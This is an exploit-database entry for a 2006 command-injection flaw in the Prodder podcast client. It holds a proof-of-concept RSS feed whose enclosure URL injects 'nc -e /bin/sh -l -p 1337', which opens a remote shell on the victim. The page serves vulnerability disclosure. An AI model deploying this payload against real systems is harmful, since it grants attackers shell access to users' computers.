header-logo
Suggest Exploit
vendor:
Prodder
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary Command-Execution
78
CWE
Product Name: Prodder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Prodder Arbitrary Command-Execution Vulnerability

Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary shell commands on the vulnerable computer in the context of the running application.

Mitigation:

Input validation should be used to prevent the execution of arbitrary commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18068/info

Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary shell commands on the vulnerable computer in the context of the running application.

<?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl"?> <rss version="2.0"> <channel> <title>RedTeam Pentesting Example Malicious Server Feed</title> <item> <enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh -l -p 1337 & ';#'" length="241734" type="audio/mpeg" /> </item> </channel> </rss>